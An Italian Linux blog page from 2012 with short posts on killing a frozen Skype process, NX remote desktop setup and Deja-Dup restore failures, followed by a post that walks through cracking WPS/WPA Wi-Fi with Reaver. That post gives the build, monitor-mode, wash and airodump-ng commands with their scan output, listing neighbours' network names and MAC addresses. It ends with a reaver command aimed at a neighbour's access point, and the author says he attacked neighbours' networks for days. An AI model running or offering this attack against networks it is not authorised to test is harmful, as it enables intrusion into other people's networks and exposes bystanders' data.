venerdì 10 febbraio 2012

lunedì 6 febbraio 2012

Come killare forzatamente task bloccati (come Skype) in Ubuntu

Molti di voi utilizzeranno Skype, sotto Linux ... Avrete notato che ha una fastidiosa tendenza a bloccarsi e soprattuto, si ha l'impossibilità di chiuderlo sia con Taskmanger che con htop.


Ecco la soluzione, ovviamente da linea di comando:  
killall -9 skype

domenica 5 febbraio 2012

Come configurare NX machine Client per Mythbuntu e Lubuntu

Il seguente articolo aiuta ad eseguire una connessione desktop remoto verso un PC Mythbuntu (Mediacenter TV Ubuntu Linux) mediante l'ottimo programma NX Machine (in versione gratuita)
Il client va' configurato con il parametro xfce4-session come mostrato in questo articolo:
http://geekyprojects.com/general/manage-mythtv-remotely-with-nx/

Maggiori informazioni su NX Machine
http://www.nomachine.com/download.php
E' interessante notare che il client puo' essere Linux, Windows o Mac !!
La sessione grafica remoto viene avviata anche senza il login dell'utente in locale (differentemente da quel che avviene con Vino)

Maggiori informazioni su Mythbuntu:
http://www.mythbuntu.org/

Per utilizzare l'utile software di controllo remoto per linux verso un pc linux con GUI LXDE è importante specificare nei parametri della sessione lato client il seguente comando:

/usr/bin/lxsession -s Lubuntu -e LXDE

Il comando va inserito nei settings di sessione specificando interfaccia X "Custom"

sabato 4 febbraio 2012

Backup Linux Deja-Dup ATTENZIONE!!!

Leggendo alcuni forvianti articoli su blog e testate varie online che si riproducono col ben noto meccanismo del copia in colla senza che nessuno alzi un dito per provare le cose in pratica.. leggevo:


DEJA DUP praticamente il sistema di backup PERFETTO per Linux ....


BENE io oggi scrivo qui :  PERFETTO UN CAZZO !!!

quando si fa il backup va sempre tutto liscio ... il problema dei backup è infatti il RESTORE e quando leggi che se vuoi provare Linux Mint o fare una upgrade "fresco" conviene fare il backup e reinstallare tutto.... che è facile ....

BENE STATE ATTENTI !!!!

Il RESTORE di DejaDup non funziona. L'importazione delle chiavi e dei repository installati produce un casino "bloccante"...

Alla fine i dati sono riuscito a tirarli fuori ma non vi dico che casino, quante prove, quante perdite di tempo, e che metodi iper spartani per recuperare i dati...

Mi lascio la libertà di prendermi un po di tempo per documentarvi bene il tutto, in ogni caso volevo avvertirvi!!! Se proprio dovete usare un sistema di backup usate DejaDup con le seguenti 2 accortezze:

-NON INTERROMPETE LA SESSIONE PER POI RIPRENDERLA SULLA STESSA CARTELLA
-FATEVI COMUNQUE UNA COPIA BANALE DEI FILE, SE QUALCOSA ANDRA' STORTO SARA' PERLOMENO PIU' FACILE RECUPERARE QUALCHE FILE DI IMPORTANZA VITALE ....

Un po' di link su duplicity che è il motore pulsante di Deja Dup
https://help.ubuntu.com/community/DuplicityBackupHowto

Ecco come tirare fuori i dati + o - manualmente e a calci per salvare il salvabile..
http://live.gnome.org/DejaDup/Help/Restore/WorstCase

venerdì 3 febbraio 2012

WPA Cracking ... un'altra favola per chi ama riempirsi la bocca ...

Di recente in Internet è apparso un nuovo sistema di forzatura delle reti WPA chiamato Reaver ... a titolo esemplificativo vi linko alcuni articoli...

http://www.bufferoverflow.it/2012/01/08/bucare-una-rete-wi-fi-protetta-con-ubuntu-usando-reaver/
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

Tempo fa' era uscito un'altro sistema (GERIX) ... leggete questo titolo ...


http://www.hackgeek.it/con-gerix-wifi-cracker-anche-mia-nonna-saprebbe-craccare-una-rete-wifi/

.... tanta fuffa, tanto copia incolla da un sito all'altro da un blog ad un'altro che hanno una cosa in comune oltre alla notizia. NESSUNO PRODUCE RISULTATI DI QUALI APPARATI RISULTINO VULNERABILI E IN QUALI CONDIZIONI.

-----------------------------------------------------------------------------
NOTA del 23/5/2013
Un'utente ci ha gentilmente segnalato su quali apparati la vulnerabilità WPS (quindi non strettamente WPA) è presente:
www.kb.cert.org/vuls/id/723755
Sapendo questo si può stabilire quali apparati provare ad attaccare a seconda del MAC address (che riconduce al brand). Incrociando le dita sul fatto che abbiano utilizzato il WPS anzichè impostare una passphrase a mano.... 
----------------------------------------------------------------------------

Bene signori, sappiate che sono tutte fandonie !!!!!
Ho lasciato giorni i PC di casa e dell'ufficio a crackare le mie reti e quelle dei vicini ... senza l'ombra di alcun risultato positivo.... ... Altro che anche mia nonna riuscirebbe a crackare una rete WPA .... solo buoffonate....

Se volete cimentarvi, vi pubblico qui una guida completa che ha funzionato sia su Ubuntu 10.04 che su 11.10.


ed estraetelo.

Reaver và compilato ... per farlo:
---------------------------------------
sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev

cd ~/Scaricati/reaver-1.4/src

./configure
make
sudo make install
-----------------------------

Per comodità installate anche la suite aircrack-ng
con il comando:
-------------------
sudo apt-get install aircrack-ng
-------------------

pare che nelle prossime versioni di ubuntu il pacchetto non sarà più presente... sarà un casino compilarlo a mano xke bisogna indietreggiare la versione del compilatore c di sistema
questo il link del sorgente:
questo un cenno sulla versione del gcc:


Dopodiche' bisogna mettere l'interfaccia wireless in modo promiscuo. (quindi disabiliteremo la connettività)
---------------------------------------------------------------------
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
-----------------------------------------------------------------
in alternativa si può usare (ma io non l'ho fatto .... tutti i comandi farebbero riferimento a mon0 anzichè wlan 0)
sudo airmon-ng start wlan0 

Ora bisogna cercare le reti vulnerabili all'attacco reaver con la sua utility WASH
-------------------------------------------------
sudo wash -i wlan0 --ignore-fcs
-------------------------------------------------

Questo il risultato:


BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:C1:C0:05:C6:A9       1            -89        1.0               No                RossoSole
E0:91:F5:46:BF:22       6            -90        1.0               No                Elio
02:BD:B9:E2:42:B2       1            -92        1.0               No                dlink
D8:5D:4C:F5:16:27       4            -90        1.0               No                TP-LINK_F51628
08:86:3B:57:23:10       6            -90        1.0               No                belkin.310

Se volete vedere la differenza tra le reti e i client presenti in aria e gli AP vulnerabili bisogna usare AIRODUMP-NG
----------------------------------------------
sudo airodump-ng wlan0

CH 13 ][ Elapsed: 1 min ][ 2012-02-01 12:15                                         
                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                      
                                                                                                     
 00:0C:42:61:4C:D5  -32      463      239    8   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:0C:42:94:93:CD  -75      353       80    2   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:14:C1:2E:66:19  -86       52        0    0  11  54e. WEP  WEP         USR9111                    
 00:E0:4D:90:F4:6C  -88       14        0    0  11  54   WPA2 CCMP   PSK  InfostradaWiFi-001399      
 E0:91:F5:46:BF:22  -88       53        2    0   6  54e. WPA2 CCMP   PSK  Elio                       
 1C:BD:B9:40:2C:0A  -88       52        0    0   6  54e  WPA2 CCMP   PSK  D-Link                     
 C0:C1:C0:05:C6:A9  -89       46        0    0   1  54e  WPA2 CCMP   PSK  RossoSole                  
 08:86:3B:57:23:10  -89        7        0    0   6  54e  WPA2 CCMP   PSK  belkin.310                 
                                                                                                     
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                           
                                                                                                     
 (not associated)   00:08:CA:21:FA:FA  -51    0 - 1      0        7                                   
 (not associated)   04:46:65:56:9B:60  -87    0 - 1      0       56  Alice-31436523,Alice-36598782,FAS
 (not associated)   3C:4A:92:AC:D9:86  -88    0 - 1     96      116  Alice-45008691                   
 00:0C:42:61:4C:D5  D8:B3:77:16:8F:7F   -1   11 - 0      0        3                                   
 00:0C:42:61:4C:D5  74:A7:22:E0:7D:84  -23   54 -54      0       10                                   
 00:0C:42:61:4C:D5  04:1E:64:BE:67:8C  -61    5 - 1      0       35  APCavalieri                      
 00:0C:42:61:4C:D5  DC:2B:61:68:D8:0E  -63    1 -54      0       86          
-----------------------------------------------

Con questi dati, ho deciso di attaccare l'AP Rossosole ... quello col segnale relativamente migliore.. devo specificare il MAC del AP

-------------------------------------
sudo reaver -i wlan0 -b C0:C1:C0:05:C6:A9 -vv
--------------------------------------